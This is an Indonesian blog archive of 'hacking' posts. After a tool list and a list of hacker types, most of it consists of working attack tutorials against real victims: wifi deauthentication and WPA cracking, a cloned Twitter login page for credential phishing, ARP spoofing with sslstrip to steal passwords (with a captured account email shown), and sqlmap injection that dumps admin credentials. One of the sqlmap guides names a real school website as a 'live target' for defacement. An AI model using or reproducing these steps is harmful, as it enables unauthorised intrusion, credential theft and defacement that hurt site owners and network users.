Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Sabtu, 05 Oktober 2013

Hacking Tools di Linux


Wireshark – Network Traffic Analyzer
Wireshark adalah tools untuk menganalisis lalu lintas paket data di jaringan. Lazim dipanggil sebagi SNIFFER (pengintai). Sniffer adalah tools yang berkemampuan menangkap paket data dalam jaringan Wireshark mampu mendecode paket data dalam banyak jenis protokol. Tersedia pada operasi sistem linux dan windows.
 
    #sudo aptitude install wireshark


Nessus – Remote Network Security Auditor

Nessus adalah scanner untuk mengetahui celah keamanan komputer, baik komputer anda atau komputer siapapun. Kemampuannya yang lengkap sebagai Vulnerability Scanner adalah nyata karena didukung dengan fitur high speed discovery, configuration auditing, asset profiling, sensitive data discovery, dan vulnerability analysis of our security posture.
    #sudo apt-get install nessus


NMAP – The Network Mapper

Adalah tools pemetaan jaringan (network) terbaik yang pernah ada sejauh ini. Panggunaannya yang praktis, konfigurasi yang mudah, dan kehandalannya dalam memetakan jaringan komputer di manapun. Dengan Nmap, anda dapat mengetahui komputer-komputer (hosts) apa saja yang sedang terhubung dalam sebuah jaringan, apa service (aplikasi) yang sedang dijalankan komputer itu (host), apa sistem operasi komputer yang dipakai, apa tipe firewall yang digunakan, dan karakteristik lainnya dari komputer.
    #sudo apt-get install nmap



Etherape – Graphical Network Monitor Modeled after Etherman

Etherape adalah tools untuk memonitor jaringan dengan tampilan grafis. Tools ini dilengkapi dengan kemampuan menghasilkan grafik dari lapisan jaringan, mode IP dan TCP, serta menampilkan kegiatan network (jaringan) secara grafis. Kita dapat memfilter traffic apa saja yang mau ditampilkan secara grafis.
    #sudo apt-get install etherape

Kismet

Siapa yang tak kenal tools ini? Sebuah tools terbaik dan satu-satunya di dunia yang mampu mendeteksi setiap jaringan (network) wireless dengan sempurna tanpa cacat sekalipun jaringan tersebut telah berusaha disembunyikan. Dengan tools standar, kita kadang terkecoh bahwa ternyata ada jaringan yang tetap ada namun tak terpantau oleh komputer kita. Kismet adalah detektor jaringan wireless, sniffer, dan sistem pendeteksi penyusup pada komputer. Kismet dapat bekerja pada beragam tipe wireless card, dengan syarat wireless card kita memiliki fitur MODE MONITOR. Kismet dapat melakukan sniffing pada traffic-traffic 802.11b, 802.11a, dan 802.11g.
    #sudo apt-get install kismet

Chkrootkit – Checks for signs of rootkits on the local system

Tools ini berfungsi melakukan identifikasi apakah sebuah komputer diinfeksi dengan rootkit. Apa itu tootkit? Ini dia jenis-jenis rootkit:

1. lrk3, lrk4, lrk5, lrk6 (and some variants);

2. Solaris rootkit;

3. FreeBSD rootkit;

4. t0rn (including latest variant);

5. Ambient’s Rootkit for Linux (ARK);

6. Ramen Worm;

7. rh[67]-shaper;

8. RSHA;

9. Romanian rootkit;

10. RK17;

11. Lion Worm;

12. Adore Worm.


    #sudo apt-get install chkrootkit

Rkhunter – Rootkit, backdoor, sniffer and exploit scanner

Tools ini sangat berguna dalam melakukan scanning system komputer kita terhadap keberadaan rootkit yang teridentifikasi berbahaya atau sangat mencurigakan, backdoors, sniffers, dan exploits.

Tools ini akan melakukan pemeriksaan berikut ini di komputer kita:

- MD5 hash changes;

- files commonly created by rootkits;

- executables with anomalous file permissions;

- suspicious strings in kernel modules;

- hidden files in system directories;

Dalam upaya scanning sistem yang optimal, anda harus mengecek sistem menggunakan RKHUNTER dan CHKROOTKIT.
    #sudo apt-get install rkhunter

TCPDump – A powerful tool for network monitoring and data acquisition

Tools ini mengizinkan anda untuk melakukan dumping terhadap lalu lintas jaringan kompute. TCPDump juga dapat digunakan untuk menguji IPv4, ICMPv4, IPv6, ICMPv6, UDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS, dan banyak tipe paket data di jaringan. Selain itu, anda juga dapat menggunakan tools ini untuk melakukan track down masalah network, mendeteksi “Ping Attacks”, dan memonitor kegiatan network.
    #sudo apt-get install tcpdump

SNORT – Flexible Network Intrusion Detection System

Ini adalah salah satu tools favorit saya dalam mendeteksi penyusup di jaringan. Kemampuan tools ini adalah yang tercanggih dalam mendeteksi attacks dan probes dalam network, seperti buffer overflows, stealth port scans, CGI attacks, SMB probes, dan lain-lain.
    #sudo apt-get install snort

Firestarter – program for managing and observing your firewall

Firestarter adalah tools lengkap mesin Linux yang berfungsi sebagai firewall. Memiliki kemampuan real-time dalam menunjukkan probing penyerang pada mesin komputer.
    #sudo apt-get install firestarter

CLAMAV – anti-virus utility for Unix

Clam antivirus adalah antivirus yang didesain untuk mesin Linux. Antivirus ini berkemampuan melakukan scanning pada:

- format Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM, BinHex, SIS, dan sebagainya

- seluruh format file mail

- seluruh format file dokument, termasuk file Microsoft Office dan file Mac Office seperti HTML, RTF dan PDF.


    #sudo apt-get install clamav

Netcat – TCP/IP swiss army knife

Netcat adalah sebuah tools simpel dari mesin linux yang berkemampuan membaca dan menuliskan paket-paket data di jaringan, baik yang berprotokol TCP maupun UDP.
    #sudo apt-get install netcat

John

Lebih terkenal dengan sebutan John the Ripper (JTR), adalah tools yang didesain untuk membantu administrator sistem dalam menemukan kelemahan password. Tools ini mampu digunakan dalam berbagai bentuk chipertext, termasuk Unix’s DES and MD5, Kerberos AFS passwords, Windows’ LM hashes, BSDI’s extended DES, dan OpenBSD’s Blowfish.

Bagi yang ingin melakukan cracking terhadap sebuah password, John the Ripper adalah jawaban terbaik.
    #sudo apt-get install john

Dnsniff – Various tools to sniff network traffic for cleartext insecurities

Dsniff adalah sebuah paket tools yang mengandung beberapa sub-tools di dalamnya untuk menyadap dan mengkreasikan jaringan.

Sub-sub tools itu adalah berikuti ini:

* arpspoof – Send out unrequested (and possibly forged) arp replies.

* dnsspoof – forge replies to arbitrary DNS address / pointer queries on the Local Area Network.

* dsniff – password sniffer for several protocols.

* filesnarf – saves selected files sniffed from NFS traffic.

* macof – flood the local network with random MAC addresses.

* mailsnarf – sniffs mail on the LAN and stores it in mbox format.

* msgsnarf – record selected messages from different Instant Messengers.

* sshmitm – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.

* sshow – SSH traffic analyser.

* tcpkill – kills specified in-progress TCP connections.

* tcpnice – slow down specified TCP connections via “active” traffic shaping.

* urlsnarf – output selected URLs sniffed from HTTP traffic in CLF.

* webmitm – HTTP / HTTPS monkey-in-the-middle. transparently proxies.

* webspy – sends URLs sniffed from a client to your local browser (requires libx11-6 installed).


    #sudo apt-get install dsniff

Jumat, 06 September 2013

7 Tipe Hacker Yang Patut Diwaspadai


Berbagai tipe hacker bersliweran di dunia maya. Bila anda tidak ingin menjadi korbannya, salah satu langkah yang bisa Anda ambil ialah dengan mengenali jenis, motivasi dan objek dari hacker-hacker tersebut. Berikut daftar tipe-tipe hacker yang bisa anda cermati :

1. Cyber Criminal
Terdiri dari kelompok besar hacker jahat yang memakai malware (program jahat) untuk mencuri uang korbannya. Berbagai cara mereka lakukan untuk mencapai gol itu seperti memanipulasi akun bank, memakai nomor kartu kredit si korban, memalsukan program antivirus atau dengan mencuri identitas termasuk password mangsanya.

2. Spammer dan penyebar adware
Penyetor spam dan adware menjala uang melalui iklan ilegal, entah karena dibayar oleh perusahaan tertentu atau karena mereka melakukannya untuk menjual produk mereka sendiri. Contoh: ‘Cheap viagra, anyone?’.

3. Advanced persistent threat (APT) agent
Tidak seperti cyber criminal, APT agents biasanya sangat terorganisir, terdiri dari grup-grup yang berduit dan memiliki tujuan jangka panjang. Tujuan mereka ialah mencuri properti intelektual sebuah perusahaan alih-alih mendapatkan uang dengan cara cepat. Mereka menjiplak ide dan produk perusahaan lain untuk direalisasikan di wilayah mereka, atau menjual informasi yang mereka dapat ke pelelang tertinggi.

4. Mata-mata perusahaan
Mirip dengan APT agents, bedanya ialah mereka biasanya tidak terorganisir. Mata-mata perusahaan berusaha untuk mencuri informasi apapun yang terkait perusahaan pesaing.

5. Hacktivist
Hacker tipe ini melancarkan aksinya dengan latar belakang politik, agama, lingkungan hingga keyakinan. Biasanya mereka mempermalukan lawannya atau mengobrak-abrik situs mereka.

6. Cyber warriors
Cyber warrior berperan dalam perang cyber di mana suatu wilayah suatu negara melawan wilayah negara lain dengan tujuan akhir melumpuhkan kemampuan militer lawan.

7. Rogue hacker
Tipe terakhir dalam daftar ini ialah rogue hacker. Mereka melakukan aksi hacking hanya untuk membuktikan skill mereka, menyombongkan diri ke teman atau hanya karena merasa tertantang dalam melakukan aksi ilegal. Aksi mereka memang mengganggu namun mereka tidak mengobrak-abrik internet atau bisnis orang lain.

Cara Mengetahui IP Address Komputer Orang Lain


Kali ini saya akan membahas secara lengkap Cara Mengetahui IP Address Komputer Orang Lain. Yap.. Melacak Ip Address Komputer Orang ini sangatlah dicari-cari oleh orang sedunia. Maka dari itu saya akan membahas secara detail. Langsung aja ke TKP.

Disini akan dibahas :
1. Melacak alamat IP suatu situs
2. Melacak Real Adress server suatu situs
3. Cara Mengetahui IP address lawan chatting kita


-== Pembahasan ===-

1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING WWW.SITUSYANGDILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.

2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka http://www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.

3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di http://www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.

Rabu, 24 Juli 2013

Memutuskan Jaringan Wifi Orang Lain dengan Backtrack

Saya kesal jika sementara asik online, tiba-tiba lambat. Untung saya pengguna backtrack.
 
Perhatikan langkah saya dalam memutuskan jaringan wifi orang lain menggunakan Backtrack

1. Buka terminal lalu ketikkan ifconfig untuk memeriksa interface anda
    wlan0 adalah nama default pada Backtrack.
    
2. Aktifkan mode monitor dengan perintah :
     airmon-ng start wlan0
 
3. Mode monitor aktif. Untuk scanning korban, masukkan perintah :

     airodump-ng mon0
    ctrl+C untuk menghentikan scanning. Tentukan target (Ex:70:f1:a1:b2:72:77)
    

4.Langkah memutuskan jaringan korban, masukkan perintah berikut

     aireplay-ng -0 jumlahpaket -a BSSID -c Macadresskorban mon0

    Jumlah paket : lamanya pemutusan jaringan tergantung banyaknya pket
    untuk BSSID
    Contoh : (aireplay-ng -0 500 -a 11:22:33:44:55:66 -c 70:f1:a1:b2:72:77 mon0)

     
Proses berhasil jika tampak seperti dibawah ini

Cara Mudah Deface Website dengan Javascript

Kali ini saya akan membahas tentang Deface Website.  Oke kita Mulai saja

1. Buka website sasaran.

2. Jika loading sudah selesai, Silahkan lakukan aksi langkah yang ketiga

3. Copy Paste kode berikut ini di adress bar website tersebut.
         javascript:document.body.contenEditable='true'; document.designMode='on'; void 0



4. Kemudian coba kalian hapus salah satu huruf di website tersebut




Just For Studying, Keep Testing

Senin, 22 Juli 2013

Tutorial Hacking Twitter Dengan Backtrack


Kita akan bahas dan belajar tentang hacking twitter (sebenrnya bisa buat semua website) dengan menggunakan fake login dan aplikasi SET (Social Engineering Tools).
 

Kita bahas step by step :

1. Setting IP eth0 sesuai yang anda inginkan, saya disini menggunakan IP 192.168.1.100
ketik : ifconfig 192.168.1.100


Cek dulu apakah IP eth0 kita sesuai yang kita ketik "192.168.1.100"
ketik : airmon-ng
Lihat baris eth0 apakah terdapat 192.168.1.100. Kalau ada, lanjut ke langkah selanjutnya.

2. Buka SET pada backtrack terdapat pada Application>>Backtrack>>Exploitation Tools>>Social Engineering tools>>Social Engineering Toolkit>>SET


Setelah terbuka, ada option yang tertera dari 1 sampai 7 dan 99. Ikutin langkah ini :
Pilih: 1 (Social-Engineering Attacks) [enter]
Pilih: 2 (WebSite Attack Vector) [enter]
Pilih: 6 (Web Jacking Attack Method) [enter] 
Pilih: 2 (Site Cloner) [enter]
 

Lalu kita diminta memasukan IP, masukan IP yang telah kita buat, 192.168.1.100 [enter]
Lalu kita diminta memasukan website yang ingin kita cloning, http://www.twitter.com [enter]

Persiapan sudah siap. Ingat.. jangan di tutup terminalnya !
Sesudah itu anda buka browser dan masukan url : 192.168.1.100/index2.html 

Nb: Selalu tambahkan /index2.html di belakang IP kita pada kotak url di browser
Lalu masukan user/email dan password seperti di bawah ini, dan anda bisa menggunakan goo.gl atau adf.ly sebagai url shorter asli kita

Setelah victim (target) memasukan user dan passwordnya dan login, maka user dan passwordnya akan tertera pada terminal kita tadi


kelemahan menggunakan trick ini :
 

- Target yang waspada..akan melihat keanehan pada linknya..address seperi itu akan mencurigakan,jadi anda harus men-shorturl link anda.. (192.168.1.100/index2.html),kecuali anda bisa mengubah ip address suatu website dalam komputer target dan target jadi salah menghubungi website,suatu saat akan saya berikan tutorialnya
 

- Trick ini berbeda dengan trick fake login biasanya,trick ini hanya bisa dilakukan selama terminal anda yang menjalankan SET masih aktif,jika di close atau komputer anda mati user dan passwordnya tidak bisa tertera dalam terminal,dan url/link yg kita buat jadi tidak valid lagi..tapi biasanya mreka para attacker yg membuat fake login dengan meretas website orang dan menginject file php dan file html login facebook pada server dan menyebarkan link tersebut dan setiap orang login akan masuk ke file php yang dibuat sebelumnya dan dapat di baca sewaktu-waktu
 


Good Luck, Keep Trying :)

Senin, 15 Juli 2013

Cara Mendapatkan Password WiFi dengan Backtrack 5

Kali ini saya akan berbagi sedikit tentang bagaimana Cara Mendapatkan Password Wifi Menggunakan BackTrack 5

Tutorial ini dibuat di OS Back|Track 5 32 GNOME, dan juga bisa berjalan pada OS berbasis UNIX lainnya.


Persiapan :
1. Aircrack
2. Dictionary attack



Langkah - Langkah :
1. Hentikan semua proses yang menghambat jalannya aireplay
2. Simpan hasil monitoring
3. Lakukan aireplay untuk mendapatkan WPA Handshake
4. Crack hasil rekaman dengan dictionary attack
5. Gameover


1. Hentikan semua proses yang menghambat jalannya aireplay
#airmon-ng check kill

2. Buat interface baru dengan mode monitor menggunakan airmon-ng
#airmon-ng start wlan0

3. Monitoring setiap akses poin yang ada di sekitar attacker

#airodump-ng mon0


4. Pilih target, kemudian Monitoring dan simpan hasil monitoring airodump
#airmon-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0



Keterangan :
1. --write : berfungsi untuk menyimpan hasil monitoring
2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
3. --chanel : channel akses poin target
4. --bssid : mac address akses poin




5. Jalankan aireplay-ng untuk mendapatkan WPA Handshake
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0

Keterangan :
1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
2. -a : mac address akses poin
3. -c : mac address klien

Note :
Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.

#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0



6. Jika sudah mendapatkan WPA handshake dari klien, langkah selanjutnya adalah menghentikan proses airodump-ng dengan menekan tombol ctrl + c, dan cracking password dengan aircrack-ng
#aircrack-ng output-01.cap -w /root/crack wpa.txt

Keterangan :
1. output-01.cap harus disesuaikan dengan nama hasil monitoring yang anda kehendaki pada tahap 4
2. -w adalah metode dictionary, diikuti dengan direktori dictionary milik anda.


7. Langkah selanjutnya adalah mengetes kebenaran dari metode ini



 Oke, Sekian Sedikit Penjelasan dari saya, Semoga bermanfaat dan ingat, jangan salah gunakan untuk hal yang tidak penting, hehehe..

Jumat, 28 Juni 2013

Sql Injection Menggunakan Sqlmap



ok langsung saja, tidak perlu banyak basa-basi lagi.

Cari target menggunakan google dorks:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=

dan masih banyak lagi yang lainnya. Jika target sudah di temukan, buka sqlmap, lokasinya di: 
Application – Backtrack – Exploitation Tools – Web Exploitation Tools – Sqlmap

Pentest target menggunakan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 --dbs

-u = url
--dbs = untuk mencari database

Output:
available databases [2]:
[*] dede
[*] information_schema

Jika sudah menemukan databasenya, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede --tables 

-D = nama database yang kita temukan tadi
--tables = mencari nama tables
Output:
Database: dede
[3 tables]
+------------------------------+
| access_log               |
| administrators        |
|  menus                     |

Jika sudah menemukan nama tables, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators --columns

-T = nama tables
--columns = mencari nama columns

Output:
[2 columns]
+--------------+--------------+
| Column       | Type    |
+--------------+--------------+
| admin_login  | text |
| admin_passwd  | text |

Jika sudah menemukan nama columns, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators -C admin_login --dump

Output:
+--+
| admin-login |
+--+
|dedetampan|

Jika sudah mendapatkan nama username, lanjut dengan mencari password dari username tersebut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators -C admin_passwd --dump

Output:
+--+
| admin-passwd |
+--+
|tb-cyber|
nah kalau sudah begini, sekarang terserah kalian mau di buat apa website tersebut ^_^




Sumber : http://dedekpli.blogspot.com/2011/11/sql-injection-with-sqlmap.html

Kamis, 27 Juni 2013

Hacking Facebook Dengan Backtrack 5 R3


Kali ini gw akan berbagi trick yaitu seperti judul yang telah disebutkan "Cara Hacking Facebook Menggunakan Backtrack 5 r3 . apa itu Backtrack? backtrack yaitu sebuah sistem operasi LINUX. oke dari pada penasaran pengen tau lebih jelasnya mari di simak dan di perhatikan betul perintah-perintahnya :

mula - mula anda masuk terminal, terus kalo udah masuk kita masuk ke root dulu dengan memberikan perintah ini sudo su-

Pertama-tama siapkan tool yang akan kita gunakan

- Arpspoof
- Sslstrip-0.9
- OS Linux 32 Bit

Setelah semua tool yang di butuhkan sudah tersedia lakukan langkah berikut (jika paket belum terinstal) :

1) Buka Terminal kemudian ketikkan : wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

2) Kemudian extract file dengan cara : tar zxvf sslstrip-0.9.tar.gz

3) Ok sekarang kita masuk ke dalam folder baru dari file yang telah kita extract tadi : cd sslstrip-0.9 

4) Dan untuk menginstal ketikkan : python setup.py install 

Lakukan langkah berikut ( Jika paket sudah terinstall )

Gunakan cara ini setiap kali jika ingin mencuri password lagi:

1) Pertama hidupkan terlebih dahulu port untuk memforward : echo ’1′ > /proc/sys/net/ipv4/ip_forward 

2) Kemudian cari gateway atau pintu dari jaringan yang akan kita sadap dengan cara : netstat -nr 

3) sekarang kita reset port http ke port 8080, ketikan : iptables -t nat -A PREROUTING -p tcp -
    destination-port 80 -j REDIRECT --to-port 8080 

4) Mulai menyadap dengn cara : arpspoof -i wlan0 192.168.0.1 ( 192.168.0.1) adalah gateway dari
    jaringan yang saya gunakan, gantilah gateway tersebut dengan gateway yang anda temukan dari
    netstat -nr tadi) 

5) Kemudian buka terminal baru lalu ketikkan  : sslstrip -l 8080 untuk mengaktifkan cookies yang akan
    kita baca 

6) Set up is complete!! Ok sekarang kita telah menyadap akses jaringan yang melewati gateway.

7) jika anda ingin melihat akses kemana sajakah itu gunakan perintah : tail -f sslstrip.log

8) dan saat ada seseorang melakuakn login entah facebook yahoo gmail atau apapun yang
    menggunakan username dan password. kita akan mengetahuinya.

karena akan memakan waktu yang cukup lama karena harus menunggu ada seseorang yang mlakukan login jadi kita harus bersabar. dan itupun akan muncul script yang cukup banyak. gunakan perintah
find "pass: (tanpa petik) agar kita lebih mudah menemukannya

HANYA UNTUK PENGETAHUAN, JANGAN DI SALAH GUNAKAN YA !

Nah ini dia contoh saat Scanning: Social Enginering Toolkit (SET)

root@bt:~# ettercap -T -q -i eth0

ettercap NG-0.7.3 copyright @2013 Neyfa Kamila

Listening on eth0... (Ethernet)

eth0 ->   00:1E:68:2E:73:4A   1.0.0.64   255.255.255.0

Privileges dropped to UID 65534 GID 65534...

12 plugins
39 protocol dissectors
33 ports monitored
7587 mac vendor fingerprint
1990 tcp OS fingerprint
2633 known services

Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

HTTP : 69.63.180.174:80 -> USER: martin.alfath@yahoo.com
PASS: c****g
INFO: http://www.facebook.com/

Dan ini Salah 1 Akun Facebook yg berhasil Gw Jebol ..

Email: martin.alfath@yahoo.com
Password: c****g


Sengaja Sebagian Password Gw pake bintang..
agar tidak ada Pencurian.. 


Kalo Mau Liat Buktinya.. Buka Facebook kalian
trus Copas emailnya di Kotak Pencari Facebook..
klik Profile'a, lalu lihat status terbarunya  ^_^

Atau Bisa Klik Link Yg Menuju Profil'a disini:

http://www.facebook.com/fadlhana


Sumber : http://nemi.faa.im/hacking-facebook-dengan-backtrack-5-r3.xhtml

Cara Deface Website Sekolah Dengan SQL Map

Halo para sobat Hackinggroups, kali ini saya akan menulis tentang Cara Deface Dengan SQL Injection yang dikenal dengan teknik SQLmap di BackTrack. Tools ini sudah ada di dalam File .ISO pada BackTrack. Disini, saya menggunakan BackTrack 5 R3.

Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=

Dan masih banyak lagi dork bertebaran di Google. Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.

http://www.sman2sidoarjo.sch.id/

Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan menambahkan tanda  - (minus) sebelum nomor id tersebut.

Contoh :
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5''
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=’5
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=-5

Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira seperti ini :


Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan perintah 
cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini.

Kemudian untuk mencari nama database, ketikkan 
./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs” 
(tanpa tanda petik) kemudian Enter.

Kemudian akan muncul seperti ini :


Disana kita dapat menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda
Setelah kita mendapatkan Database tersebut, kita tulis “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables” (tanpa tanda petik) kemudian Enter.

Setelah itu akan muncul beberapa Tabel.

Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter.

Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.


Nah, kita sekarang sudah menemukan User + Pass Administrator dari Website tersebut :D



Jika sudah mendapatkan User + Pass, pasti Anda tau kan yang harus dilakukan ?
Nah, tinggal cari Login Adminnya deh
Caranya banyak kok di Google

Sekian dulu dari saya, saya ucapkan Terimakasih Banyak :)
Untuk yang ingin belajar SQL Map, silahkan menggunakan live target http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5